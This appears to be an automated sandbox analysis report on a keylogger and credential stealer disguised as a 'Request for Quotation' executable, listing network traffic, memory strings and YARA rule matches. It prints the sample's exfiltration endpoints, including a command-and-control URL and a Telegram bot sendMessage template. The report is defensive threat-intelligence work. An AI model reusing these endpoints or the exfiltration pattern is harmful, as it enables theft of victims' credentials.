Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 11:20:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 11:20:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3841092416.00000000069A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/C5
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000310A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000A.00000002.1469660734.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003247000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000326E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/0
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\0009\
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\PerfStringBackup.TMP
Deletes files inside the Windows folder
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Detected potential crypto function
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0153D51C 0_2_0153D51C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0741CD7B 0_2_0741CD7B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07415350 0_2_07415350
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_074173A8 0_2_074173A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07414F18 0_2_07414F18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07416E8A 0_2_07416E8A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07416E98 0_2_07416E98
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07414AE0 0_2_07414AE0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C19B 9_2_0162C19B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162A088 9_2_0162A088
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01625362 9_2_01625362
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162D278 9_2_0162D278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162D548 9_2_0162D548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C468 9_2_0162C468
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C738 9_2_0162C738
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_016269A0 9_2_016269A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162E988 9_2_0162E988
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CA08 9_2_0162CA08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CCD8 9_2_0162CCD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01626FC8 9_2_01626FC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CFAC 9_2_0162CFAC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162F961 9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162E97C 9_2_0162E97C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_016229EC 9_2_016229EC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01623AB1 9_2_01623AB1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01623E09 9_2_01623E09
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE1E80 9_2_06DE1E80
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE17A0 9_2_06DE17A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9C70 9_2_06DE9C70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEFC68 9_2_06DEFC68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9548 9_2_06DE9548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0B30 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE5028 9_2_06DE5028
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE2968 9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE6B0 9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE6A0 9_2_06DEE6A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE1E70 9_2_06DE1E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEDE00 9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE178F 9_2_06DE178F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEF51 9_2_06DEEF51
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEF60 9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DECC8F 9_2_06DECC8F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DECCA0 9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEDDFF 9_2_06DEDDFF
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED550 9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED540 9_2_06DED540
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEAF8 9_2_06DEEAF8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE258 9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE249 9_2_06DEE249
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9BFB 9_2_06DE9BFB
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE8B91 9_2_06DE8B91
